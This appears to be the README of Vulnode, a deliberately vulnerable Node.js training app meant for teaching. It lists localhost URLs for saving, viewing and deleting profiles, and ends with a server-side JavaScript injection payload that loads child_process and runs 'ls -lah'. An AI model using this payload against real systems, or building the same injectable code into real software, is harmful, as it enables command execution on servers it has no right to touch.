Vulnode is a Node.js application vulnerable to server-side javascript injection. This is for education purposes only.

• Save a profile: http://localhost:9091/?action=save&name=nishant&json={"name":"Nishant","age":"25","gender":"Male","location":"Bangalore","interests":"Piano"}


• View a profile: http://localhost:9091/?action=view&name=nishant


• Delete a profile: http://localhost:9091/?action=delete&name=nishant


• Code Execution: http://localhost:9091/?json='test');var sys=require('sys');var exec=require('child_process').exec;function puts(error,stdout,stderr){sys.puts(stdout)};exec("ls -lah",puts);